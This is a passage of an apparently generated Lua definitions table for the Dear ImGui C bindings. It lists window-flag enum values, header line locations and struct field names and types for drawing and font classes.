defs["enums"]["ImGuiWindowFlags_"][14]["value"] = "1 << 12"
defs["enums"]["ImGuiWindowFlags_"][15] = {}
defs["enums"]["ImGuiWindowFlags_"][15]["calc_value"] = 8192
defs["enums"]["ImGuiWindowFlags_"][15]["name"] = "ImGuiWindowFlags_NoBringToFrontOnFocus"
defs["enums"]["ImGuiWindowFlags_"][15]["value"] = "1 << 13"
defs["enums"]["ImGuiWindowFlags_"][16] = {}
defs["enums"]["ImGuiWindowFlags_"][16]["calc_value"] = 16384
defs["enums"]["ImGuiWindowFlags_"][16]["name"] = "ImGuiWindowFlags_AlwaysVerticalScrollbar"
defs["enums"]["ImGuiWindowFlags_"][16]["value"] = "1 << 14"
defs["enums"]["ImGuiWindowFlags_"][17] = {}
defs["enums"]["ImGuiWindowFlags_"][17]["calc_value"] = 32768
defs["enums"]["ImGuiWindowFlags_"][17]["name"] = "ImGuiWindowFlags_AlwaysHorizontalScrollbar"
defs["enums"]["ImGuiWindowFlags_"][17]["value"] = "1<< 15"
defs["enums"]["ImGuiWindowFlags_"][18] = {}
defs["enums"]["ImGuiWindowFlags_"][18]["calc_value"] = 65536
defs["enums"]["ImGuiWindowFlags_"][18]["name"] = "ImGuiWindowFlags_AlwaysUseWindowPadding"
defs["enums"]["ImGuiWindowFlags_"][18]["value"] = "1 << 16"
defs["enums"]["ImGuiWindowFlags_"][19] = {}
defs["enums"]["ImGuiWindowFlags_"][19]["calc_value"] = 262144
defs["enums"]["ImGuiWindowFlags_"][19]["name"] = "ImGuiWindowFlags_NoNavInputs"
defs["enums"]["ImGuiWindowFlags_"][19]["value"] = "1 << 18"
defs["enums"]["ImGuiWindowFlags_"][20] = {}
defs["enums"]["ImGuiWindowFlags_"][20]["calc_value"] = 524288
defs["enums"]["ImGuiWindowFlags_"][20]["name"] = "ImGuiWindowFlags_NoNavFocus"
defs["enums"]["ImGuiWindowFlags_"][20]["value"] = "1 << 19"
defs["enums"]["ImGuiWindowFlags_"][21] = {}
defs["enums"]["ImGuiWindowFlags_"][21]["calc_value"] = 1048576
defs["enums"]["ImGuiWindowFlags_"][21]["name"] = "ImGuiWindowFlags_UnsavedDocument"
defs["enums"]["ImGuiWindowFlags_"][21]["value"] = "1 << 20"
defs["enums"]["ImGuiWindowFlags_"][22] = {}
defs["enums"]["ImGuiWindowFlags_"][22]["calc_value"] = 786432
defs["enums"]["ImGuiWindowFlags_"][22]["name"] = "ImGuiWindowFlags_NoNav"
defs["enums"]["ImGuiWindowFlags_"][22]["value"] = "ImGuiWindowFlags_NoNavInputs | ImGuiWindowFlags_NoNavFocus"
defs["enums"]["ImGuiWindowFlags_"][23] = {}
defs["enums"]["ImGuiWindowFlags_"][23]["calc_value"] = 43
defs["enums"]["ImGuiWindowFlags_"][23]["name"] = "ImGuiWindowFlags_NoDecoration"
defs["enums"]["ImGuiWindowFlags_"][23]["value"] = "ImGuiWindowFlags_NoTitleBar | ImGuiWindowFlags_NoResize | ImGuiWindowFlags_NoScrollbar | ImGuiWindowFlags_NoCollapse"
defs["enums"]["ImGuiWindowFlags_"][24] = {}
defs["enums"]["ImGuiWindowFlags_"][24]["calc_value"] = 786944
defs["enums"]["ImGuiWindowFlags_"][24]["name"] = "ImGuiWindowFlags_NoInputs"
defs["enums"]["ImGuiWindowFlags_"][24]["value"] = "ImGuiWindowFlags_NoMouseInputs | ImGuiWindowFlags_NoNavInputs | ImGuiWindowFlags_NoNavFocus"
defs["enums"]["ImGuiWindowFlags_"][25] = {}
defs["enums"]["ImGuiWindowFlags_"][25]["calc_value"] = 8388608
defs["enums"]["ImGuiWindowFlags_"][25]["name"] = "ImGuiWindowFlags_NavFlattened"
defs["enums"]["ImGuiWindowFlags_"][25]["value"] = "1 << 23"
defs["enums"]["ImGuiWindowFlags_"][26] = {}
defs["enums"]["ImGuiWindowFlags_"][26]["calc_value"] = 16777216
defs["enums"]["ImGuiWindowFlags_"][26]["name"] = "ImGuiWindowFlags_ChildWindow"
defs["enums"]["ImGuiWindowFlags_"][26]["value"] = "1 << 24"
defs["enums"]["ImGuiWindowFlags_"][27] = {}
defs["enums"]["ImGuiWindowFlags_"][27]["calc_value"] = 33554432
defs["enums"]["ImGuiWindowFlags_"][27]["name"] = "ImGuiWindowFlags_Tooltip"
defs["enums"]["ImGuiWindowFlags_"][27]["value"] = "1 << 25"
defs["enums"]["ImGuiWindowFlags_"][28] = {}
defs["enums"]["ImGuiWindowFlags_"][28]["calc_value"] = 67108864
defs["enums"]["ImGuiWindowFlags_"][28]["name"] = "ImGuiWindowFlags_Popup"
defs["enums"]["ImGuiWindowFlags_"][28]["value"] = "1 << 26"
defs["enums"]["ImGuiWindowFlags_"][29] = {}
defs["enums"]["ImGuiWindowFlags_"][29]["calc_value"] = 134217728
defs["enums"]["ImGuiWindowFlags_"][29]["name"] = "ImGuiWindowFlags_Modal"
defs["enums"]["ImGuiWindowFlags_"][29]["value"] = "1 << 27"
defs["enums"]["ImGuiWindowFlags_"][30] = {}
defs["enums"]["ImGuiWindowFlags_"][30]["calc_value"] = 268435456
defs["enums"]["ImGuiWindowFlags_"][30]["name"] = "ImGuiWindowFlags_ChildMenu"
defs["enums"]["ImGuiWindowFlags_"][30]["value"] = "1 << 28"
defs["enumtypes"] = {}
defs["locations"] = {}
defs["locations"]["ImColor"] = "imgui:2167"
defs["locations"]["ImDrawChannel"] = "imgui:2261"
defs["locations"]["ImDrawCmd"] = "imgui:2216"
defs["locations"]["ImDrawCmdHeader"] = "imgui:2253"
defs["locations"]["ImDrawData"] = "imgui:2450"
defs["locations"]["ImDrawFlags_"] = "imgui:2287"
defs["locations"]["ImDrawList"] = "imgui:2325"
defs["locations"]["ImDrawListFlags_"] = "imgui:2307"
defs["locations"]["ImDrawListSplitter"] = "imgui:2270"
defs["locations"]["ImDrawVert"] = "imgui:2238"
defs["locations"]["ImFont"] = "imgui:2667"
defs["locations"]["ImFontAtlas"] = "imgui:2566"
defs["locations"]["ImFontAtlasCustomRect"] = "imgui:2528"
defs["locations"]["ImFontAtlasFlags_"] = "imgui:2541"
defs["locations"]["ImFontConfig"] = "imgui:2472"
defs["locations"]["ImFontGlyph"] = "imgui:2501"
defs["locations"]["ImFontGlyphRangesBuilder"] = "imgui:2513"
defs["locations"]["ImGuiBackendFlags_"] = "imgui:1384"
defs["locations"]["ImGuiButtonFlags_"] = "imgui:1490"
defs["locations"]["ImGuiCol_"] = "imgui:1394"
defs["locations"]["ImGuiColorEditFlags_"] = "imgui:1503"
defs["locations"]["ImGuiComboFlags_"] = "imgui:1023"
defs["locations"]["ImGuiCond_"] = "imgui:1595"
defs["locations"]["ImGuiConfigFlags_"] = "imgui:1368"
defs["locations"]["ImGuiDataType_"] = "imgui:1260"
defs["locations"]["ImGuiDir_"] = "imgui:1276"
defs["locations"]["ImGuiDragDropFlags_"] = "imgui:1238"
defs["locations"]["ImGuiFocusedFlags_"] = "imgui:1210"
defs["locations"]["ImGuiHoveredFlags_"] = "imgui:1222"
defs["locations"]["ImGuiIO"] = "imgui:1755"
defs["locations"]["ImGuiInputTextCallbackData"] = "imgui:1897"
defs["locations"]["ImGuiInputTextFlags_"] = "imgui:933"
defs["locations"]["ImGuiKeyModFlags_"] = "imgui:1323"
defs["locations"]["ImGuiKey_"] = "imgui:1295"
defs["locations"]["ImGuiListClipper"] = "imgui:2118"
defs["locations"]["ImGuiMouseButton_"] = "imgui:1567"
defs["locations"]["ImGuiMouseCursor_"] = "imgui:1577"
defs["locations"]["ImGuiNavInput_"] = "imgui:1336"
defs["locations"]["ImGuiOnceUponAFrame"] = "imgui:1996"
defs["locations"]["ImGuiPayload"] = "imgui:1937"
defs["locations"]["ImGuiPopupFlags_"] = "imgui:996"
defs["locations"]["ImGuiSelectableFlags_"] = "imgui:1012"
defs["locations"]["ImGuiSizeCallbackData"] = "imgui:1928"
defs["locations"]["ImGuiSliderFlags_"] = "imgui:1550"
defs["locations"]["ImGuiSortDirection_"] = "imgui:1287"
defs["locations"]["ImGuiStorage"] = "imgui:2058"
defs["locations"]["ImGuiStoragePair"] = "imgui:2061"
defs["locations"]["ImGuiStyle"] = "imgui:1701"
defs["locations"]["ImGuiStyleVar_"] = "imgui:1459"
defs["locations"]["ImGuiTabBarFlags_"] = "imgui:1037"
defs["locations"]["ImGuiTabItemFlags_"] = "imgui:1053"
defs["locations"]["ImGuiTableBgTarget_"] = "imgui:1201"
defs["locations"]["ImGuiTableColumnFlags_"] = "imgui:1146"
defs["locations"]["ImGuiTableColumnSortSpecs"] = "imgui:1959"
defs["locations"]["ImGuiTableFlags_"] = "imgui:1089"
defs["locations"]["ImGuiTableRowFlags_"] = "imgui:1186"
defs["locations"]["ImGuiTableSortSpecs"] = "imgui:1973"
defs["locations"]["ImGuiTextBuffer"] = "imgui:2031"
defs["locations"]["ImGuiTextFilter"] = "imgui:2004"
defs["locations"]["ImGuiTextRange"] = "imgui:2014"
defs["locations"]["ImGuiTreeNodeFlags_"] = "imgui:967"
defs["locations"]["ImGuiViewport"] = "imgui:2738"
defs["locations"]["ImGuiViewportFlags_"] = "imgui:2723"
defs["locations"]["ImGuiWindowFlags_"] = "imgui:893"
defs["locations"]["ImVec2"] = "imgui:230"
defs["locations"]["ImVec4"] = "imgui:243"
defs["structs"] = {}
defs["structs"]["ImColor"] = {}
defs["structs"]["ImColor"][1] = {}
defs["structs"]["ImColor"][1]["name"] = "Value"
defs["structs"]["ImColor"][1]["type"] = "ImVec4"
defs["structs"]["ImDrawChannel"] = {}
defs["structs"]["ImDrawChannel"][1] = {}
defs["structs"]["ImDrawChannel"][1]["name"] = "_CmdBuffer"
defs["structs"]["ImDrawChannel"][1]["template_type"] = "ImDrawCmd"
defs["structs"]["ImDrawChannel"][1]["type"] = "ImVector_ImDrawCmd"
defs["structs"]["ImDrawChannel"][2] = {}
defs["structs"]["ImDrawChannel"][2]["name"] = "_IdxBuffer"
defs["structs"]["ImDrawChannel"][2]["template_type"] = "ImDrawIdx"
defs["structs"]["ImDrawChannel"][2]["type"] = "ImVector_ImDrawIdx"
defs["structs"]["ImDrawCmd"] = {}
defs["structs"]["ImDrawCmd"][1] = {}
defs["structs"]["ImDrawCmd"][1]["name"] = "ClipRect"
defs["structs"]["ImDrawCmd"][1]["type"] = "ImVec4"
defs["structs"]["ImDrawCmd"][2] = {}
defs["structs"]["ImDrawCmd"][2]["name"] = "TextureId"
defs["structs"]["ImDrawCmd"][2]["type"] = "ImTextureID"
defs["structs"]["ImDrawCmd"][3] = {}
defs["structs"]["ImDrawCmd"][3]["name"] = "VtxOffset"
defs["structs"]["ImDrawCmd"][3]["type"] = "unsigned int"
defs["structs"]["ImDrawCmd"][4] = {}
defs["structs"]["ImDrawCmd"][4]["name"] = "IdxOffset"
defs["structs"]["ImDrawCmd"][4]["type"] = "unsigned int"
defs["structs"]["ImDrawCmd"][5] = {}
defs["structs"]["ImDrawCmd"][5]["name"] = "ElemCount"
defs["structs"]["ImDrawCmd"][5]["type"] = "unsigned int"
defs["structs"]["ImDrawCmd"][6] = {}
defs["structs"]["ImDrawCmd"][6]["name"] = "UserCallback"
defs["structs"]["ImDrawCmd"][6]["type"] = "ImDrawCallback"
defs["structs"]["ImDrawCmd"][7] = {}
defs["structs"]["ImDrawCmd"][7]["name"] = "UserCallbackData"
defs["structs"]["ImDrawCmd"][7]["type"] = "void*"
defs["structs"]["ImDrawCmdHeader"] = {}
defs["structs"]["ImDrawCmdHeader"][1] = {}
defs["structs"]["ImDrawCmdHeader"][1]["name"] = "ClipRect"
defs["structs"]["ImDrawCmdHeader"][1]["type"] = "ImVec4"
defs["structs"]["ImDrawCmdHeader"][2] = {}
defs["structs"]["ImDrawCmdHeader"][2]["name"] = "TextureId"
defs["structs"]["ImDrawCmdHeader"][2]["type"] = "ImTextureID"
defs["structs"]["ImDrawCmdHeader"][3] = {}
defs["structs"]["ImDrawCmdHeader"][3]["name"] = "VtxOffset"
defs["structs"]["ImDrawCmdHeader"][3]["type"] = "unsigned int"
defs["structs"]["ImDrawData"] = {}
defs["structs"]["ImDrawData"][1] = {}
defs["structs"]["ImDrawData"][1]["name"] = "Valid"
defs["structs"]["ImDrawData"][1]["type"] = "bool"
defs["structs"]["ImDrawData"][2] = {}
defs["structs"]["ImDrawData"][2]["name"] = "CmdListsCount"
defs["structs"]["ImDrawData"][2]["type"] = "int"
defs["structs"]["ImDrawData"][3] = {}
defs["structs"]["ImDrawData"][3]["name"] = "TotalIdxCount"
defs["structs"]["ImDrawData"][3]["type"] = "int"
defs["structs"]["ImDrawData"][4] = {}
defs["structs"]["ImDrawData"][4]["name"] = "TotalVtxCount"
defs["structs"]["ImDrawData"][4]["type"] = "int"
defs["structs"]["ImDrawData"][5] = {}
defs["structs"]["ImDrawData"][5]["name"] = "CmdLists"
defs["structs"]["ImDrawData"][5]["type"] = "ImDrawList**"
defs["structs"]["ImDrawData"][6] = {}
defs["structs"]["ImDrawData"][6]["name"] = "DisplayPos"
defs["structs"]["ImDrawData"][6]["type"] = "ImVec2"
defs["structs"]["ImDrawData"][7] = {}
defs["structs"]["ImDrawData"][7]["name"] = "DisplaySize"
defs["structs"]["ImDrawData"][7]["type"] = "ImVec2"
defs["structs"]["ImDrawData"][8] = {}
defs["structs"]["ImDrawData"][8]["name"] = "FramebufferScale"
defs["structs"]["ImDrawData"][8]["type"] = "ImVec2"
defs["structs"]["ImDrawList"] = {}
defs["structs"]["ImDrawList"][1] = {}
defs["structs"]["ImDrawList"][1]["name"] = "CmdBuffer"
defs["structs"]["ImDrawList"][1]["template_type"] = "ImDrawCmd"
defs["structs"]["ImDrawList"][1]["type"] = "ImVector_ImDrawCmd"
defs["structs"]["ImDrawList"][2] = {}
defs["structs"]["ImDrawList"][2]["name"] = "IdxBuffer"
defs["structs"]["ImDrawList"][2]["template_type"] = "ImDrawIdx"
defs["structs"]["ImDrawList"][2]["type"] = "ImVector_ImDrawIdx"
defs["structs"]["ImDrawList"][3] = {}
defs["structs"]["ImDrawList"][3]["name"] = "VtxBuffer"
defs["structs"]["ImDrawList"][3]["template_type"] = "ImDrawVert"
defs["structs"]["ImDrawList"][3]["type"] = "ImVector_ImDrawVert"
defs["structs"]["ImDrawList"][4] = {}
defs["structs"]["ImDrawList"][4]["name"] = "Flags"
defs["structs"]["ImDrawList"][4]["type"] = "ImDrawListFlags"
defs["structs"]["ImDrawList"][5] = {}
defs["structs"]["ImDrawList"][5]["name"] = "_VtxCurrentIdx"
defs["structs"]["ImDrawList"][5]["type"] = "unsigned int"
defs["structs"]["ImDrawList"][6] = {}
defs["structs"]["ImDrawList"][6]["name"] = "_Data"
defs["structs"]["ImDrawList"][6]["type"] = "const ImDrawListSharedData*"
defs["structs"]["ImDrawList"][7] = {}
defs["structs"]["ImDrawList"][7]["name"] = "_OwnerName"
defs["structs"]["ImDrawList"][7]["type"] = "const char*"
defs["structs"]["ImDrawList"][8] = {}
defs["structs"]["ImDrawList"][8]["name"] = "_VtxWritePtr"
defs["structs"]["ImDrawList"][8]["type"] = "ImDrawVert*"
defs["structs"]["ImDrawList"][9] = {}
defs["structs"]["ImDrawList"][9]["name"] = "_IdxWritePtr"
defs["structs"]["ImDrawList"][9]["type"] = "ImDrawIdx*"
defs["structs"]["ImDrawList"][10] = {}
defs["structs"]["ImDrawList"][10]["name"] = "_ClipRectStack"
defs["structs"]["ImDrawList"][10]["template_type"] = "ImVec4"
defs["structs"]["ImDrawList"][10]["type"] = "ImVector_ImVec4"
defs["structs"]["ImDrawList"][11] = {}
defs["structs"]["ImDrawList"][11]["name"] = "_TextureIdStack"
defs["structs"]["ImDrawList"][11]["template_type"] = "ImTextureID"
defs["structs"]["ImDrawList"][11]["type"] = "ImVector_ImTextureID"
defs["structs"]["ImDrawList"][12] = {}
defs["structs"]["ImDrawList"][12]["name"] = "_Path"
defs["structs"]["ImDrawList"][12]["template_type"] = "ImVec2"
defs["structs"]["ImDrawList"][12]["type"] = "ImVector_ImVec2"
defs["structs"]["ImDrawList"][13] = {}
defs["structs"]["ImDrawList"][13]["name"] = "_CmdHeader"
defs["structs"]["ImDrawList"][13]["type"] = "ImDrawCmdHeader"
defs["structs"]["ImDrawList"][14] = {}
defs["structs"]["ImDrawList"][14]["name"] = "_Splitter"
defs["structs"]["ImDrawList"][14]["type"] = "ImDrawListSplitter"
defs["structs"]["ImDrawList"][15] = {}
defs["structs"]["ImDrawList"][15]["name"] = "_FringeScale"
defs["structs"]["ImDrawList"][15]["type"] = "float"
defs["structs"]["ImDrawListSplitter"] = {}
defs["structs"]["ImDrawListSplitter"][1] = {}
defs["structs"]["ImDrawListSplitter"][1]["name"] = "_Current"
defs["structs"]["ImDrawListSplitter"][1]["type"] = "int"
defs["structs"]["ImDrawListSplitter"][2] = {}
defs["structs"]["ImDrawListSplitter"][2]["name"] = "_Count"
defs["structs"]["ImDrawListSplitter"][2]["type"] = "int"
defs["structs"]["ImDrawListSplitter"][3] = {}
defs["structs"]["ImDrawListSplitter"][3]["name"] = "_Channels"
defs["structs"]["ImDrawListSplitter"][3]["template_type"] = "ImDrawChannel"
defs["structs"]["ImDrawListSplitter"][3]["type"] = "ImVector_ImDrawChannel"
defs["structs"]["ImDrawVert"] = {}
defs["structs"]["ImDrawVert"][1] = {}
defs["structs"]["ImDrawVert"][1]["name"] = "pos"
defs["structs"]["ImDrawVert"][1]["type"] = "ImVec2"
defs["structs"]["ImDrawVert"][2] = {}
defs["structs"]["ImDrawVert"][2]["name"] = "uv"
defs["structs"]["ImDrawVert"][2]["type"] = "ImVec2"
defs["structs"]["ImDrawVert"][3] = {}
defs["structs"]["ImDrawVert"][3]["name"] = "col"
defs["structs"]["ImDrawVert"][3]["type"] = "ImU32"
defs["structs"]["ImFont"] = {}
defs["structs"]["ImFont"][1] = {}
defs["structs"]["ImFont"][1]["name"] = "IndexAdvanceX"
defs["structs"]["ImFont"][1]["template_type"] = "float"
defs["structs"]["ImFont"][1]["type"] = "ImVector_float"
defs["structs"]["ImFont"][2] = {}
defs["structs"]["ImFont"][2]["name"] = "FallbackAdvanceX"
defs["structs"]["ImFont"][2]["type"] = "float"
defs["structs"]["ImFont"][3] = {}
defs["structs"]["ImFont"][3]["name"] = "FontSize"
defs["structs"]["ImFont"][3]["type"] = "float"
defs["structs"]["ImFont"][4] = {}
defs["structs"]["ImFont"][4]["name"] = "IndexLookup"
defs["structs"]["ImFont"][4]["template_type"] = "ImWchar"
defs["structs"]["ImFont"][4]["type"] = "ImVector_ImWchar"
defs["structs"]["ImFont"][5] = {}
defs["structs"]["ImFont"][5]["name"] = "Glyphs"
defs["structs"]["ImFont"][5]["template_type"] = "ImFontGlyph"
defs["structs"]["ImFont"][5]["type"] = "ImVector_ImFontGlyph"
defs["structs"]["ImFont"][6] = {}
defs["structs"]["ImFont"][6]["name"] = "FallbackGlyph"
defs["structs"]["ImFont"][6]["type"] = "const ImFontGlyph*"
defs["structs"]["ImFont"][7] = {}
defs["structs"]["ImFont"][7]["name"] = "ContainerAtlas"
defs["structs"]["ImFont"][7]["type"] = "ImFontAtlas*"
defs["structs"]["ImFont"][8] = {}
defs["structs"]["ImFont"][8]["name"] = "ConfigData"
defs["structs"]["ImFont"][8]["type"] = "const ImFontConfig*"
defs["structs"]["ImFont"][9] = {}
defs["structs"]["ImFont"][9]["name"] = "ConfigDataCount"
defs["structs"]["ImFont"][9]["type"] = "short"
defs["structs"]["ImFont"][10] = {}
defs["structs"]["ImFont"][10]["name"] = "FallbackChar"
defs["structs"]["ImFont"][10]["type"] = "ImWchar"
defs["structs"]["ImFont"][11] = {}
defs["structs"]["ImFont"][11]["name"] = "EllipsisChar"
defs["structs"]["ImFont"][11]["type"] = "ImWchar"
defs["structs"]["ImFont"][12] = {}
defs["structs"]["ImFont"][12]["name"] = "DirtyLookupTables"
defs["structs"]["ImFont"][12]["type"] = "bool"
defs["structs"]["ImFont"][13] = {}
defs["structs"]["ImFont"][13]["name"] = "Scale"
defs["structs"]["ImFont"][13]["type"] = "float"
defs["structs"]["ImFont"][14] = {}
defs["structs"]["ImFont"][14]["name"] = "Ascent"
defs["structs"]["ImFont"][14]["type"] = "float"
defs["structs"]["ImFont"][15] = {}
defs["structs"]["ImFont"][15]["name"] = "Descent"
defs["structs"]["ImFont"][15]["type"] = "float"
defs["structs"]["ImFont"][16] = {}
defs["structs"]["ImFont"][16]["name"] = "MetricsTotalSurface"
defs["structs"]["ImFont"][16]["type"] = "int"
defs["structs"]["ImFont"][17] = {}
defs["structs"]["ImFont"][17]["name"] = "Used4kPagesMap[(0x10FFFF+1)/4096/8]"
defs["structs"]["ImFont"][17]["size"] = 34
defs["structs"]["ImFont"][17]["type"] = "ImU8"
defs["structs"]["ImFontAtlas"] = {}
defs["structs"]["ImFontAtlas"][1] = {}
defs["structs"]["ImFontAtlas"][1]["name"] = "Flags"
defs["structs"]["ImFontAtlas"][1]["type"] = "ImFontAtlasFlags"
defs["structs"]["ImFontAtlas"][2] = {}
defs["structs"]["ImFontAtlas"][2]["name"] = "TexID"
defs["structs"]["ImFontAtlas"][2]["type"] = "ImTextureID"
defs["structs"]["ImFontAtlas"][3] = {}
defs["structs"]["ImFontAtlas"][3]["name"] = "TexDesiredWidth"
defs["structs"]["ImFontAtlas"][3]["type"] = "int"
defs["structs"]["ImFontAtlas"][4] = {}
defs["structs"]["ImFontAtlas"][4]["name"] = "TexGlyphPadding"
defs["structs"]["ImFontAtlas"][4]["type"] = "int"
defs["structs"]["ImFontAtlas"][5] = {}
defs["structs"]["ImFontAtlas"][5]["name"] = "Locked"
defs["structs"]["ImFontAtlas"][5]["type"] = "bool"
defs["structs"]["ImFontAtlas"][6] = {}
defs["structs"]["ImFontAtlas"][6]["name"] = "TexPixelsUseColors"
defs["structs"]["ImFontAtlas"][6]["type"] = "bool"
defs["structs"]["ImFontAtlas"][7] = {}
defs["structs"]["ImFontAtlas"][7]["name"] = "TexPixelsAlpha8"
defs["structs"]["ImFontAtlas"][7]["type"] = "unsigned char*"
defs["structs"]["ImFontAtlas"][8] = {}
defs["structs"]["ImFontAtlas"][8]["name"] = "TexPixelsRGBA32"
defs["structs"]["ImFontAtlas"][8]["type"] = "unsigned int*"
defs["structs"]["ImFontAtlas"][9] = {}
defs["structs"]["ImFontAtlas"][9]["name"] = "TexWidth"
defs["structs"]["ImFontAtlas"][9]["type"] = "int"
defs["structs"]["ImFontAtlas"][10] = {}
defs["structs"]["ImFontAtlas"][10]["name"] = "TexHeight"
defs["structs"]["ImFontAtlas"][10]["type"] = "int"
defs["structs"]["ImFontAtlas"][11] = {}
defs["structs"]["ImFontAtlas"][11]["name"] = "TexUvScale"
defs["structs"]["ImFontAtlas"][11]["type"] = "ImVec2"
defs["structs"]["ImFontAtlas"][12] = {}
defs["structs"]["ImFontAtlas"][12]["name"] = "TexUvWhitePixel"
defs["structs"]["ImFontAtlas"][12]["type"] = "ImVec2"
defs["structs"]["ImFontAtlas"][13] = {}
defs["structs"]["ImFontAtlas"][13]["name"] = "Fonts"
defs["structs"]["ImFontAtlas"][13]["template_type"] = "ImFont*"
defs["structs"]["ImFontAtlas"][13]["type"] = "ImVector_ImFontPtr"
defs["structs"]["ImFontAtlas"][14] = {}
defs["structs"]["ImFontAtlas"][14]["name"] = "CustomRects"
defs["structs"]["ImFontAtlas"][14]["template_type"] = "ImFontAtlasCustomRect"
defs["structs"]["ImFontAtlas"][14]["type"] = "ImVector_ImFontAtlasCustomRect"
defs["structs"]["ImFontAtlas"][15] = {}
defs["structs"]["ImFontAtlas"][15]["name"] = "ConfigData"
defs["structs"]["ImFontAtlas"][15]["template_type"] = "ImFontConfig"
defs["structs"]["ImFontAtlas"][15]["type"] = "ImVector_ImFontConfig"
defs["structs"]["ImFontAtlas"][16] = {}
defs["structs"]["ImFontAtlas"][16]["name"] = "TexUvLines[(63)+1]"
defs["structs"]["ImFontAtlas"][16]["size"] = 64
defs["structs"]["ImFontAtlas"][16]["type"] = "ImVec4"
defs["structs"]["ImFontAtlas"][17] = {}
defs["structs"]["ImFontAtlas"][17]["name"] = "FontBuilderIO"
defs["structs"]["ImFontAtlas"][17]["type"] = "const ImFontBuilderIO*"
defs["structs"]["ImFontAtlas"][18] = {}
defs["structs"]["ImFontAtlas"][18]["name"] = "FontBuilderFlags"
defs["structs"]["ImFontAtlas"][18]["type"] = "unsigned int"
defs["structs"]["ImFontAtlas"][19] = {}
defs["structs"]["ImFontAtlas"][19]["name"] = "PackIdMouseCursors"
defs["structs"]["ImFontAtlas"][19]["type"] = "int"
defs["structs"]["ImFontAtlas"][20] = {}
defs["structs"]["ImFontAtlas"][20]["name"] = "PackIdLines"
defs["structs"]["ImFontAtlas"][20]["type"] = "int"
defs["structs"]["ImFontAtlasCustomRect"] = {}
defs["structs"]["ImFontAtlasCustomRect"][1] = {}
defs["structs"]["ImFontAtlasCustomRect"][1]["name"] = "Width"
defs["structs"]["ImFontAtlasCustomRect"][1]["type"] = "unsigned short"
defs["structs"]["ImFontAtlasCustomRect"][2] = {}
defs["structs"]["ImFontAtlasCustomRect"][2]["name"] = "Height"
defs["structs"]["ImFontAtlasCustomRect"][2]["type"] = "unsigned short"
defs["structs"]["ImFontAtlasCustomRect"][3] = {}
defs["structs"]["ImFontAtlasCustomRect"][3]["name"] = "X"
defs["structs"]["ImFontAtlasCustomRect"][3]["type"] = "unsigned short"
defs["structs"]["ImFontAtlasCustomRect"][4] = {}
defs["structs"]["ImFontAtlasCustomRect"][4]["name"] = "Y"
defs["structs"]["ImFontAtlasCustomRect"][4]["type"] = "unsigned short"
defs["structs"]["ImFontAtlasCustomRect"][5] = {}
defs["structs"]["ImFontAtlasCustomRect"][5]["name"] = "GlyphID"
defs["structs"]["ImFontAtlasCustomRect"][5]["type"] = "unsigned int"
defs["structs"]["ImFontAtlasCustomRect"][6] = {}
defs["structs"]["ImFontAtlasCustomRect"][6]["name"] = "GlyphAdvanceX"
defs["structs"]["ImFontAtlasCustomRect"][6]["type"] = "float"
defs["structs"]["ImFontAtlasCustomRect"][7] = {}
defs["structs"]["ImFontAtlasCustomRect"][7]["name"] = "GlyphOffset"
defs["structs"]["ImFontAtlasCustomRect"][7]["type"] = "ImVec2"
defs["structs"]["ImFontAtlasCustomRect"][8] = {}
defs["structs"]["ImFontAtlasCustomRect"][8]["name"] = "Font"
defs["structs"]["ImFontAtlasCustomRect"][8]["type"] = "ImFont*"
defs["structs"]["ImFontConfig"] = {}
defs["structs"]["ImFontConfig"][1] = {}
defs["structs"]["ImFontConfig"][1]["name"] = "FontData"
defs["structs"]["ImFontConfig"][1]["type"] = "void*"
defs["structs"]["ImFontConfig"][2] = {}
defs["structs"]["ImFontConfig"][2]["name"] = "FontDataSize"
defs["structs"]["ImFontConfig"][2]["type"] = "int"
defs["structs"]["ImFontConfig"][3] = {}
defs["structs"]["ImFontConfig"][3]["name"] = "FontDataOwnedByAtlas"
defs["structs"]["ImFontConfig"][3]["type"] = "bool"
defs["structs"]["ImFontConfig"][4] = {}
defs["structs"]["ImFontConfig"][4]["name"] = "FontNo"
defs["structs"]["ImFontConfig"][4]["type"] = "int"
defs["structs"]["ImFontConfig"][5] = {}
defs["structs"]["ImFontConfig"][5]["name"] = "SizePixels"
defs["structs"]["ImFontConfig"][5]["type"] = "float"
defs["structs"]["ImFontConfig"][6] = {}
defs["structs"]["ImFontConfig"][6]["name"] = "OversampleH"
defs["structs"]["ImFontConfig"][6]["type"] = "int"
defs["structs"]["ImFontConfig"][7] = {}
defs["structs"]["ImFontConfig"][7]["name"] = "OversampleV"
defs["structs"]["ImFontConfig"][7]["type"] = "int"
defs["structs"]["ImFontConfig"][8] = {}
defs["structs"]["ImFontConfig"][8]["name"] = "PixelSnapH"
defs["structs"]["ImFontConfig"][8]["type"] = "bool"
defs["structs"]["ImFontConfig"][9] = {}
defs["structs"]["ImFontConfig"][9]["name"] = "GlyphExtraSpacing"
defs["structs"]["ImFontConfig"][9]["type"] = "ImVec2"
defs["structs"]["ImFontConfig"][10] = {}
defs["structs"]["ImFontConfig"][10]["name"] = "GlyphOffset"
defs["structs"]["ImFontConfig"][10]["type"] = "ImVec2"
defs["structs"]["ImFontConfig"][11] = {}
defs["structs"]["ImFontConfig"][11]["name"] = "GlyphRanges"
defs["structs"]["ImFontConfig"][11]["type"] = "const ImWchar*"
defs["structs"]["ImFontConfig"][12] = {}
defs["structs"]["ImFontConfig"][12]["name"] = "GlyphMinAdvanceX"
defs["structs"]["ImFontConfig"][12]["type"] = "float"
defs["structs"]["ImFontConfig"][13] = {}
defs["structs"]["ImFontConfig"][13]["name"] = "GlyphMaxAdvanceX"
defs["structs"]["ImFontConfig"][13]["type"] = "float"
defs["structs"]["ImFontConfig"][14] = {}
defs["structs"]["ImFontConfig"][14]["name"] = "MergeMode"
defs["structs"]["ImFontConfig"][14]["type"] = "bool"
defs["structs"]["ImFontConfig"][15] = {}
defs["structs"]["ImFontConfig"][15]["name"] = "FontBuilderFlags"
defs["structs"]["ImFontConfig"][15]["type"] = "unsigned int"
defs["structs"]["ImFontConfig"][16] = {}
defs["structs"]["ImFontConfig"][16]["name"] = "RasterizerMultiply"
defs["structs"]["ImFontConfig"][16]["type"] = "float"
defs["structs"]["ImFontConfig"][17] = {}
defs["structs"]["ImFontConfig"][17]["name"] = "EllipsisChar"
defs["structs"]["ImFontConfig"][17]["type"] = "ImWchar"
defs["structs"]["ImFontConfig"][18] = {}
defs["structs"]["ImFontConfig"][18]["name"] = "Name[40]"
defs["structs"]["ImFontConfig"][18]["size"] = 40
defs["structs"]["ImFontConfig"][18]["type"] = "char"
defs["structs"]["ImFontConfig"][19] = {}
defs["structs"]["ImFontConfig"][19]["name"] = "DstFont"
